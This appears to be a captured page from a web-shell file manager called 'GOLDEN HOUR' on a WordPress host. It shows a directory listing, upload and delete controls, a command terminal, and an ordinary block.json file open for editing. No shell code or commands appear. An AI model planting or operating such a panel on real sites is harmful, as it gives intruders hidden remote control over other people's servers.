GOLDEN HOUR
DIR: /home/vlabbdco/public_html/LV/wp-includes/blocks/html
UP
UPLOAD
Name
Size
Action
block.json
472 B
DEL
editor-rtl.css
846 B
DEL
editor-rtl.min.css
758 B
DEL
editor.css
845 B
DEL
editor.min.css
757 B
DEL
Edit: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/html", "title": "Custom HTML", "category": "widgets", "description": "Add custom HTML code and preview it as you edit.", "keywords": [ "embed" ], "textdomain": "default", "attributes": { "content": { "type": "string", "source": "raw" } }, "supports": { "customClassName": false, "className": false, "html": false }, "editorStyle": "wp-block-html-editor" }
SAVE FILE
TERMINAL
EXEC